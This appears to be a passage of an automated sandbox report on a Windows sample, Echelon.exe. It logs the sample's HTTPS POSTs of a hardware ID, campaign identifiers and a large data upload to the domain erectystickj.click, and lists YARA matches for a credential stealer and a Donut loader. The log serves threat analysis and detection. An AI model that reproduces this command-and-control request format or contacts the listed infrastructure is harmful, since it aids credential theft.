                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anV%2B4Zm6c66OZrXwNGG87xp%2FTFy4g02BGLvXIEXSp8ofDdk7tjEC%2FuJa9vqqsiylvb67bUGfEZMr%2FpEedOrHlbmXQbxa%2FhaPXytff6QTx1zU78njpunlJIO6utVOF3cUWKyC3O0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494870dcc4344-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1752&rtt_var=672&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21487&delivery_rate=1611479&cwnd=47&unsent_bytes=0&cid=f154af65d188bea6&ts=961&x=0"
2024-12-23 01:29:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 01:29:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49723 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 01:29:24 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=FIS1F4GASLGQZWSM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1252
                                                                                      Host: erectystickj.click
2024-12-23 01:29:24 UTC | 1252 | OUT | Data Ascii:
--FIS1F4GASLGQZWSM
Content-Disposition: form-data; name="hwid"

0A6BF6089C326C48040CF816C08B1DD4
--FIS1F4GASLGQZWSM
Content-Disposition: form-data; name="pid"

1
--FIS1F4GASLGQZWSM
Content-Disposition: form-data; name="lid"

yau6Na--1816906785
2024-12-23 01:29:25 UTC | 1138 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=i334ejgl9fr44u7lgjrvhtoodf; expires=Thu, 17 Apr 2025 19:16:04 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX%2BQ%2FINwEVYuluww%2BPfbbPYq64h22RF2Ja09P9Mc1KGt8gYc9QeRSmGw2SKzkbjZPuRjUG3igYza%2Bi77S036%2B8J8D%2BZdHqQzoS0sCYPYLGuSJ3jTvP7f74TKoG6JH%2BzXSmY%2FNOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f64949b4a4141f5-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1695&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2169&delivery_rate=1722713&cwnd=211&unsent_bytes=0&cid=f6459adbcf0a20ff&ts=801&x=0"
                                                                                      2024-12-23 01:29:25 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-23 01:29:25 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      6           192.168.2.5  49733        172.67.154.166  443               3356  C:\Users\user\Desktop\Echelon.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      2024-12-23 01:29:27 UTC  279  OUT  POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=9ZAVLE8JOVKM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 570028
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:27 UTC  15331  OUT  Data Raw: 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f
                                                                                      Data Ascii: --9ZAVLE8JOVKMContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--9ZAVLE8JOVKMContent-Disposition: form-data; name="pid"1--9ZAVLE8JOVKMContent-Disposition: form-data; name="lid"yau6Na--1816906785--9ZAVLE8JO
                                                                                      2024-12-23 01:29:30 UTC  1135  IN  HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7063gbv3p9nuet7c34flp8btvn; expires=Thu, 17 Apr 2025 19:16:08 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=msFVrLFhA2HdQfhN2zQECpF1wh0TkCnKnWgfKIL9pnsRbhI%2FGErGwD6F8LDHKsHVFHgqLyy6nu1xNC2qPIxovmyKcpn04J55Lv2M8ksTXPwXgHGmc0lGSf4DEvX%2FE%2Fa2HFgWdwM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494ad7ccb7c82-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=2003&rtt_var=762&sent=334&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=572571&delivery_rate=1427174&cwnd=212&unsent_bytes=0&cid=4ccb94319e2a2501&ts=2460&x=0"


                                                                                      Target ID:0
                                                                                      Start time:20:29:00
                                                                                      Start date:22/12/2024
                                                                                      Path:C:\Users\user\Desktop\Echelon.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Echelon.exe"
                                                                                      Imagebase:0x810000
                                                                                      File size:6'689'112 bytes
                                                                                      MD5 hash:CBDEF49D32CF66BFA4C8A86D225B11BD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      No disassembly